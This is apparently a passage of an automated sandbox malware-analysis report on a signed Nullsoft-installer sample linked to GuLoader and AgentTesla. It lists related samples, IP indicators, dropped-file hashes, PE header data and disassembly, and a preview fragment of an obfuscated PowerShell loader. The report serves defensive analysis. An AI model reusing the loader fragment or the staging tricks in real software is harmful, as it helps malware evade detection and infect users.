                                        xCjIO3SCur0S.exeGet hashmaliciousRemcosBrowse
                                        • 185.29.11.23
                                        new.cmdGet hashmaliciousGuLoaderBrowse
                                        • 185.29.11.28
                                        temp.cmdGet hashmaliciousUnknownBrowse
                                        • 185.29.11.28
                                        price_request_.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                        • 185.29.11.62
                                        disprovable.dllGet hashmaliciousCryptOne, QbotBrowse
                                        • 84.38.133.191

                                        JA3 Fingerprints

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        54328bd36c14bd82ddaa0c04b25ed9adz84TTREMITTANCEUSD347_432_63.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 188.114.97.3
                                        rLegalOpinionCopy_doc.cmdGet hashmaliciousVIP KeyloggerBrowse
                                        • 188.114.97.3
                                        cargo details.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • 188.114.97.3
                                        Teklifformu_Ekinoks LS 1087251 04-00000152.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • 188.114.97.3
                                        FAKTURA_.EXE.exeGet hashmaliciousDarkTortilla, Snake KeyloggerBrowse
                                        • 188.114.97.3
                                        rTEKL__FTALEPVEF__YATTEKL__F___xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 188.114.97.3
                                        rTEKL__FTALEPVEF__YATTEKL__F__.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 188.114.97.3
                                        rPROFORMAINVOICE-PO_ATS_1036pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • 188.114.97.3
                                        rBSH200924_pdf.cmd.exeGet hashmaliciousVIP KeyloggerBrowse
                                        • 188.114.97.3
                                        t1RVQb98yT.exeGet hashmaliciousS400 RATBrowse
                                        • 188.114.97.3
                                        3b5074b1b5d032e5620f69f9f700ff0eShipping documents 000022999878999800009999.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                        • 149.154.167.220
                                        z84TTREMITTANCEUSD347_432_63.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 149.154.167.220
                                        rLegalOpinionCopy_doc.cmdGet hashmaliciousVIP KeyloggerBrowse
                                        • 149.154.167.220
                                        update.ps1Get hashmaliciousNetSupport RAT, HTMLPhisherBrowse
                                        • 149.154.167.220
                                        https://1drv.ms/o/s!AnrtiNmLLRZglVBmj_pzjvzIvHZ7?e=WnZeS1Get hashmaliciousHtmlDropperBrowse
                                        • 149.154.167.220
                                        https://texicoschools-my.sharepoint.com/:f:/p/bhadley/EsaMKJ-X61dEm1tZEaws2DMBSjLuzfhGBl4pu2aaho1XiQ?e=fJogeVGet hashmaliciousUnknownBrowse
                                        • 149.154.167.220
                                        hnvc.vbsGet hashmaliciousPureLog StealerBrowse
                                        • 149.154.167.220
                                        wm.vbsGet hashmaliciousPureLog Stealer, XWormBrowse
                                        • 149.154.167.220
                                        Teklifformu_Ekinoks LS 1087251 04-00000152.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • 149.154.167.220
                                        http://mir-belting.comGet hashmaliciousUnknownBrowse
                                        • 149.154.167.220

                                        Dropped Files

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        C:\Users\user\AppData\Local\Temp\nsbB152.tmp\nsExec.dllShipping documents 000022999878999800009999.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                          Ze1Ueabtx5.imgGet hashmaliciousAgentTesla, GuLoaderBrowse
                                            Documenti di spedizione 0009333000459595995.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                              4hIPvzV6a2.exeGet hashmaliciousUnknownBrowse
                                                SecuriteInfo.com.PUA.Tool.InstSrv.10.14191.25974.exeGet hashmaliciousUnknownBrowse
                                                  SecuriteInfo.com.PUA.Tool.InstSrv.10.14191.25974.exeGet hashmaliciousUnknownBrowse
                                                    3Dut8dFCwD.exeGet hashmaliciousUnknownBrowse
                                                      Ms63nDrOBa.exeGet hashmaliciousUnknownBrowse
                                                        SecuriteInfo.com.PUA.Tool.InstSrv.10.1046.23999.exeGet hashmaliciousUnknownBrowse
                                                          SecuriteInfo.com.PUA.Tool.InstSrv.10.1046.23999.exeGet hashmaliciousUnknownBrowse

                                                            Created / dropped Files

                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:data
                                                            Category:modified
                                                            Size (bytes):8003
                                                            Entropy (8bit):4.840877972214509
                                                            Encrypted:false
                                                            SSDEEP:192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
                                                            MD5:106D01F562D751E62B702803895E93E0
                                                            SHA1:CBF19C2392BDFA8C2209F8534616CCA08EE01A92
                                                            SHA-256:6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
                                                            SHA-512:81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
                                                            Malicious:false
                                                            Reputation:moderate, very likely benign file
                                                            Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2crrhbxx.mhi.psm1

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Reputation:high, very likely benign file
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mbvr5gzv.hbs.ps1

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Reputation:high, very likely benign file
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\nsbB152.tmp\nsExec.dll

                                                            Download File
                                                            Process:C:\Users\user\Desktop\file.exe
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):7168
                                                            Entropy (8bit):5.2959870663251625
                                                            Encrypted:false
                                                            SSDEEP:96:JwzdzBzMDhOZZDbXf5GsWvSv1ckne94SDbYkvML1HT1fUNQaSGYuH0DQ:JTQHDb2vSuOc41ZfUNQZGdHM
                                                            MD5:B4579BC396ACE8CAFD9E825FF63FE244
                                                            SHA1:32A87ED28A510E3B3C06A451D1F3D0BA9FAF8D9C
                                                            SHA-256:01E72332362345C415A7EDCB366D6A1B52BE9AC6E946FB9DA49785C140BA1A4B
                                                            SHA-512:3A76E0E259A0CA12275FED922CE6E01BDFD9E33BA85973E80101B8025EF9243F5E32461A113BBCC6AA75E40894BB5D3A42D6B21045517B6B3CF12D76B4CFA36A
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Joe Sandbox View:
                                                            • Filename: Shipping documents 000022999878999800009999.exe, Detection: malicious, Browse
                                                            • Filename: Ze1Ueabtx5.img, Detection: malicious, Browse
                                                            • Filename: Documenti di spedizione 0009333000459595995.exe, Detection: malicious, Browse
                                                            • Filename: 4hIPvzV6a2.exe, Detection: malicious, Browse
                                                            • Filename: SecuriteInfo.com.PUA.Tool.InstSrv.10.14191.25974.exe, Detection: malicious, Browse
                                                            • Filename: SecuriteInfo.com.PUA.Tool.InstSrv.10.14191.25974.exe, Detection: malicious, Browse
                                                            • Filename: 3Dut8dFCwD.exe, Detection: malicious, Browse
                                                            • Filename: Ms63nDrOBa.exe, Detection: malicious, Browse
                                                            • Filename: SecuriteInfo.com.PUA.Tool.InstSrv.10.1046.23999.exe, Detection: malicious, Browse
                                                            • Filename: SecuriteInfo.com.PUA.Tool.InstSrv.10.1046.23999.exe, Detection: malicious, Browse
                                                            Reputation:moderate, very likely benign file
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................,.................Rich...........................PE..L...Q.d...........!......................... ...............................P............@..........................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..<.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\acneform\Camomiles.Bev

                                                            Download File
                                                            Process:C:\Users\user\Desktop\file.exe
                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                            Category:dropped
                                                            Size (bytes):72766
                                                            Entropy (8bit):5.199237020314929
                                                            Encrypted:false
                                                            SSDEEP:1536:13twgdZfLUclpxZnFhI/8Qb+X/JDOsq3eJwdCzDzZier9:13qUFUclCzb+xDO/arr9
                                                            MD5:99EBA9ECC95F62898E4DF3AA12CB4624
                                                            SHA1:C21A35B90111B01C32C9E963B20AAA01B35658A6
                                                            SHA-256:B8408FC8DF3CD3C0938D8314568B278D72CB102B8D128A11608CAB75A2046B21
                                                            SHA-512:42B40C55DC01197D21B6DBB5C4D0CA77BE2CA890A70FAB1E0022DEFBDE7204A8B19387915FE144B540333BDB72FDE557E8F1673131830FAF455AA0FB25E6A347
                                                            Malicious:false
                                                            Preview:$Raderingens=$Vagabonds;<#Winning Nonvibrator Reachableness Lithographing Filcursoren #><#Bekend Suppeskeens Consideration #><#Hjalmer Misperceiving Luvgirig Taktmssigt Expensiveness Fanglinernes Neohexane #><#Replicas Mbelpoliturers Rustiest Landgreverne Incloses nonmodern #><#Valeting Frstebehandlingernes Alcoholically unvivid Unwork Hyperpituitarism #><#wee Dawnstreak Bakuninism Sublecturer Alfredo Normalness Circumvent #>$Impositive = "longere;Modelre`$EjermndS Makedow lkegra Treledn SadneskPostulaeacti,otyKastanioRepromioSurr.almGarganee Dis nfr stony a enshanIntensigK lkninsShivere=Yarboro`$kogevasSBrevbakwChromopaDeoxyrinSkifterkImprecaeReedlinyAv.adoriF nnedesOmkartepprfabrieVelsignh.efunctuSubjicieCardiosr Militas quawbe;StaurotfMis,ighu CaptornSchizo.c Walkent DantepiDekup,eoGdningsnEjendom yphaeHEavesdroFerielicSafariik SedimeeCoccothyConvertsUds iftp GestusiAfhjemllAudiogrlVirkelieOverb dr .olkeveOpbrugss Sand m Benzofl(sundhed`$KoleraePEtaper,aFnuggedeUnikummsCentau aC

                                                            C:\Users\user\AppData\Local\acneform\Tjenestepligterne\file.exe

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                            Category:dropped
                                                            Size (bytes):750104
                                                            Entropy (8bit):7.620010644230869
                                                            Encrypted:false
                                                            SSDEEP:12288:TfLdembnSidi8rrdTT4aQUh9IHUM1mPCeBxHnymwsXFDsiJjWlWVB0mPHp:TfLNnSsi8dTTCjmqePSrsXF4i7XPPJ
                                                            MD5:7FBB332B55F872E61C8307E0B5242287
                                                            SHA1:B499466240EF01DA4A2CF380D709752B2E44232A
                                                            SHA-256:9845ACC424512CC5B0C67DE96CE917624B5E80EE95EA4EA6A7CBC37B7C03EF63
                                                            SHA-512:E813F006263B87A5078BCA9C58B94567AC8DF627B27D44411774B797BDD7095F9BEBAFF8A1D2F0329B8FC63016199EF7E04EC17D68CE28B250CD3DA37C2E8D04
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 21%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN.s~..PN..VH..PN.Rich.PN.........................PE..L...l.d.................j..........25............@.................................kK....@..........................................P...d...........h..p............................................................................................text....h.......j.................. ..`.rdata..d............n..............@..@.data...............................@....ndata.......P...........................rsrc....d...P...f..................@..@................................................................................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\acneform\Tjenestepligterne\file.exe:Zone.Identifier

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):26
                                                            Entropy (8bit):3.95006375643621
                                                            Encrypted:false
                                                            SSDEEP:3:ggPYV:rPYV
                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                            Malicious:true
                                                            Preview:[ZoneTransfer]....ZoneId=0

                                                            C:\Users\user\AppData\Local\acneform\Tjenestepligterne\rettersted.bef

                                                            Download File
                                                            Process:C:\Users\user\Desktop\file.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):328009
                                                            Entropy (8bit):1.2551228776153396
                                                            Encrypted:false
                                                            SSDEEP:1536:AfCPIKQLWsgBwj5eZNb+h+QkSGkJPsGyksKU:ATKZNbTQkSGky0sKU
                                                            MD5:78C7002A6C29415CEA767894F99BDF01
                                                            SHA1:37B39AF4E61D2A97D1B1AEA54D1C3C3D8C3AD6D8
                                                            SHA-256:414BB9BB930F1269088CF9BF027667E6B9A4130E6E719E7C178406A8C8C3183E
                                                            SHA-512:A39B5656AF287783AB4C5E211C148D2D233AB635E8D8C4870693D31267904E9C94A3BCC07B20F92C55F68BC7E6E2B5F1D22C6ED3F9B3A729CABD14B2E7B58D58
                                                            Malicious:false
                                                            Preview:..............................................A............................................]..............2.................................N.................................................................................................................................i.......................................................................................X............h...................j...........,............)...w....................................R.................................V...............................................................R.../.........................................)...................................................].............................,...v............................................./.......................................`........)........#..........x............H.....................................v..........K..........................................................................................................*............................

                                                            C:\Users\user\AppData\Local\acneform\Tjenestepligterne\xenosaurid.txt

                                                            Download File
                                                            Process:C:\Users\user\Desktop\file.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):453
                                                            Entropy (8bit):4.241518252490206
                                                            Encrypted:false
                                                            SSDEEP:6:mTXCFWRbo5FpTNrQNFqqhq48RZ8av8Atp3d6G4bg3pCp+oWKHYAtpcRvFVTZqIMC:0X4OA7aY48MNAtDMeExYAYdfqI1f1o2
                                                            MD5:261F38F05E7DE27DA302C07B62E1F94D
                                                            SHA1:8D495D43FC7A2B40C52B8D31678F24B519257610
                                                            SHA-256:50D950EE2F6CD5D31AAA35B913DC46C8EEE3120B7444EF5EBB302B88851F3328
                                                            SHA-512:62106A1D3608A63C12D6E9A7A00FD775ECD38193B779D4C13E18850230F1C7A1F0BD5DF0602AF5553F24BB0BAD6703BB9DC00C09C14E91DD098CE4EC95050E47
                                                            Malicious:false
                                                            Preview:stulls sprttede trlkvinder materialerne,disciplinerendes antirailwayist topchefs dhyana behovsanalyserne,vager cimnel bonderve debitable karyotin sadelmagervrkstederne samfundskonomien plakatopstning horologe vaner taleruafhaengigt..flimmer carryout arbejdsdisketterne breakaxe vidtaabne elastose.attestationerne mennonist rubicon barogrammerne respectively reddet overretention,brdknivenes yndlingsbog ministate paleogeographically repenalize henriett.

                                                            C:\Users\user\AppData\Local\acneform\Tvangsforflytnings.Fus

                                                            Download File
                                                            Process:C:\Users\user\Desktop\file.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):340463
                                                            Entropy (8bit):7.6883510403915185
                                                            Encrypted:false
                                                            SSDEEP:6144:/UUvKKVQiIl/mdVzp9A2e3dLVKPbsKZpRqHrb5OmuwYjofT:MUvKKyAFOh3DwYKQuSfT
                                                            MD5:B7996FE76D831F7949992DA7E460B2F6
                                                            SHA1:AC086BA78FB87FD615A5C4B760EBB90057EBB46E
                                                            SHA-256:DBD8E48ED8E7EC0FBEAD479F69B3A733C33D2F814EF70161F7D65331CC069C02
                                                            SHA-512:4721F5D304B7077C29FB87923B8278E326E1EEBB24446BA450445006C7976D75BD529A119AF3E72DA009FF4CC1907690417823EA95430962F35FFFE598DD2F77
                                                            Malicious:false
                                                            Preview:...............\\\./.....ccc....G.......__..P...................5...----.o............NN...........r..........@@@....;;...........F.....III...... ....s.zz.DDD.........................A.O.oo...CC......eeeeee..g........................&&&.u..%%%..........w...5./...Q...22..z.99.....*..................B.22.......................................................((.%%.....5.'..b........................................$......YY.............Y.................>>......*........................].............o.+.EEE......55.....................Y..||..........DDDDDD....................Z....................;......n.\.........C..J.&&...`..n....K..................0000.g...........U..A.........,,,...!.$$....##....22....k.....................zz."...1.QQ.....z..........||............111111...0..........ddd.XX........mm.............................K..............ff..c..............6...................n.........p.$....o.................CC.|..ff.....,,...<............................... .....................

                                                            C:\Users\user\AppData\Local\acneform\afplingen.che

                                                            Download File
                                                            Process:C:\Users\user\Desktop\file.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):245776
                                                            Entropy (8bit):1.2423947315855175
                                                            Encrypted:false
                                                            SSDEEP:768:7x19EzEPqdI04IDk5wH/o606sFjlhpHi98oiQErpn6jGW3LSSW1Vn+7xd4R89Z9u:13ujvdGpic/cN2q8+js/5/H
                                                            MD5:9F9EC5CB34B99692A4EAC963634A7D82
                                                            SHA1:5C1C97F3B00365F6CDB43112D31D7DD3AA050870
                                                            SHA-256:7579E3606C789ED66E555D541F14BDA6ECAEA4B2EB7B7BC3A25E7C804B3AB48F
                                                            SHA-512:A574404306396B333F64FC16256C093CA1F2B6CF87E5675ED678F00DE3B899FFE4A95CBA4D1113B9C86B8C46549D06D7AB97930955F921CD73AE37D4067B1EB0
                                                            Malicious:false
                                                            Preview:......................................................{............J...............l....................w...........N....................................................................\.........................................|.........................{..............i.................................k...............!......&..............................................................................................................."...........................t.:...s............................................................A...................................................................d.........................2.......|................................................Y............&...............................5.......(................................`..............................*............i..........................................>........................................~.....................................................................................................I

                                                            C:\Users\user\AppData\Local\acneform\forlggere.bov

                                                            Download File
                                                            Process:C:\Users\user\Desktop\file.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):452228
                                                            Entropy (8bit):1.250842541049128
                                                            Encrypted:false
                                                            SSDEEP:768:qlmssNPVJP2ri6hEVTp7WLL1GEOCTOemgej7kcwntQz2Y1drtNhgCV+AhB/7/dR+:5tvPloD3bnq3TzwesbDEfLeaz6oSzjU8
                                                            MD5:30C2C02FB78EFAA65C6A38457A7DC4F6
                                                            SHA1:40AEF6B9982695F88F0515104BFEEACFAF22FEDA
                                                            SHA-256:CE57C2DEDAA3A0FD5F5C267F3336F5ACB6109D00D31A98D4638D26A77939CEFC
                                                            SHA-512:8AC0B2E7831C801D7C4043195BEFC309F2C79BE719FF0171D0A4E580671EBADD2F737C307A4AAE2E548705CD11B24FE64F07C6E842D7DD5D3CCD88EA677BC7FA
                                                            Malicious:false
                                                            Preview:...........................................t..................................................................................................a..............d...........................o.........................=..#..............0.........<.........0.......................>..........`..........................................................................................:.........u.............................................0.................................C..~.............................................X......................................................"............................f........................................w.................................{............................"..................e........................................f...........l...............................................I............................ Z...........................;.............;.................................u.................................................................%....

                                                            Static File Info

                                                            General

                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                            Entropy (8bit):7.620010644230869
                                                            TrID:
                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                            • DOS Executable Generic (2002/1) 0.02%
                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                            File name:file.exe
                                                            File size:750'104 bytes
                                                            MD5:7fbb332b55f872e61c8307e0b5242287
                                                            SHA1:b499466240ef01da4a2cf380d709752b2e44232a
                                                            SHA256:9845acc424512cc5b0c67de96ce917624b5e80ee95ea4ea6a7cbc37b7c03ef63
                                                            SHA512:e813f006263b87a5078bca9c58b94567ac8df627b27d44411774b797bdd7095f9bebaff8a1d2f0329b8fc63016199ef7e04ec17d68ce28b250cd3da37c2e8d04
                                                            SSDEEP:12288:TfLdembnSidi8rrdTT4aQUh9IHUM1mPCeBxHnymwsXFDsiJjWlWVB0mPHp:TfLNnSsi8dTTCjmqePSrsXF4i7XPPJ
                                                            TLSH:06F412093FB8E6F3C0D16D3915B243561BF0B19615496F137310BF4AA9AE6A3980EFE4
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN..s~..PN..VH..PN.Rich.PN.........................PE..L...l..d.................j.........

                                                            File Icon

                                                            Icon Hash:2b25372d4e5ad12f

                                                            Static PE Info

                                                            General

                                                            Entrypoint:0x403532
                                                            Entrypoint Section:.text
                                                            Digitally signed:true
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                            Time Stamp:0x64A0DC6C [Sun Jul 2 02:09:48 2023 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:4
                                                            OS Version Minor:0
                                                            File Version Major:4
                                                            File Version Minor:0
                                                            Subsystem Version Major:4
                                                            Subsystem Version Minor:0
                                                            Import Hash:f4639a0b3116c2cfc71144b88a929cfd

                                                            Authenticode Signature

                                                            Signature Valid:false
                                                            Signature Issuer:CN="Dumdristig Cathetometer ", O=Nonculpably, L=Medaryville, S=Indiana, C=US
                                                            Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                            Error Number:-2146762487
                                                            Not Before, Not After
                                                            • 13/05/2024 04:15:20 13/05/2027 04:15:20
                                                            Subject Chain
                                                            • CN="Dumdristig Cathetometer ", O=Nonculpably, L=Medaryville, S=Indiana, C=US
                                                            Version:3
                                                            Thumbprint MD5:2125E78073B3DE10354E99A49884F940
                                                            Thumbprint SHA-1:633626C811E5AD013D25FF7C0026F7D7152AC243
                                                            Thumbprint SHA-256:ECEA41CEFFE02297DF1297EBEE32E2BD6E688EF8E19AF9254DAF23053AB9C26F
                                                            Serial:44FB76A8AED1ADDCF3394332BFEEF80025A47D57

                                                            Entrypoint Preview

                                                            Instruction
                                                            sub esp, 000003F8h
                                                            push ebp
                                                            push esi
                                                            push edi
                                                            push 00000020h
                                                            pop edi
                                                            xor ebp, ebp
                                                            push 00008001h
                                                            mov dword ptr [esp+20h], ebp
                                                            mov dword ptr [esp+18h], 0040A2D8h
                                                            mov dword ptr [esp+14h], ebp
                                                            call dword ptr [004080A4h]
                                                            mov esi, dword ptr [004080A8h]
                                                            lea eax, dword ptr [esp+34h]
                                                            push eax
                                                            mov dword ptr [esp+4Ch], ebp
                                                            mov dword ptr [esp+0000014Ch], ebp
                                                            mov dword ptr [esp+00000150h], ebp
                                                            mov dword ptr [esp+38h], 0000011Ch
                                                            call esi
                                                            test eax, eax
                                                            jne 00007FCB690670EAh
                                                            lea eax, dword ptr [esp+34h]
                                                            mov dword ptr [esp+34h], 00000114h
                                                            push eax
                                                            call esi
                                                            mov ax, word ptr [esp+48h]
                                                            mov ecx, dword ptr [esp+62h]
                                                            sub ax, 00000053h
                                                            add ecx, FFFFFFD0h
                                                            neg ax
                                                            sbb eax, eax
                                                            mov byte ptr [esp+0000014Eh], 00000004h
                                                            not eax
                                                            and eax, ecx
                                                            mov word ptr [esp+00000148h], ax
                                                            cmp dword ptr [esp+38h], 0Ah
                                                            jnc 00007FCB690670B8h
                                                            and word ptr [esp+42h], 0000h
                                                            mov eax, dword ptr [esp+40h]
                                                            movzx ecx, byte ptr [esp+3Ch]
                                                            mov dword ptr [004347B8h], eax
                                                            xor eax, eax
                                                            mov ah, byte ptr [esp+38h]
                                                            movzx eax, ax
                                                            or eax, ecx
                                                            xor ecx, ecx
                                                            mov ch, byte ptr [esp+00000148h]
                                                            movzx ecx, cx
                                                            shl eax, 10h
                                                            or eax, ecx
                                                            movzx ecx, byte ptr [esp+0000004Eh]

                                                            Rich Headers

                                                            Programming Language:
                                                            • [EXP] VC++ 6.0 SP5 build 8804

                                                            Data Directories

                                                            NameVirtual AddressVirtual Size Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x86080xa0.rdata
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x650000x264e8.rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0xb68a80x970
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IAT0x80000x2a8.rdata
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                            Sections

                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                            .text0x10000x68d80x6a00742185983fa6320c910f81782213e56fFalse0.6695165094339622data6.478461709868021IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                            .rdata0x80000x14640x1600a995b118b38426885fc6ccaa984c8b7aFalse0.4314630681818182data4.969091535632612IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .data0xa0000x2a8180x6009a9bf385a30f1656fc362172b16d9268False0.5247395833333334data4.172601271908501IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .ndata0x350000x300000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .rsrc0x650000x264e80x266008c15b9178dda9297a3b68e6314e77cb0False0.48827488802931596data5.053989943267582IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                            Resources

                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                            RT_ICON0x652c80x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536EnglishUnited States0.4677629244055365
                                                            RT_ICON0x75af00x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 36864EnglishUnited States0.5025751524069791
                                                            RT_ICON0x7ef980x5488Device independent bitmap graphic, 72 x 144 x 32, image size 20736EnglishUnited States0.5306377079482439
                                                            RT_ICON0x844200x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384EnglishUnited States0.5394426074633916
                                                            RT_ICON0x886480x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216EnglishUnited States0.5737551867219917
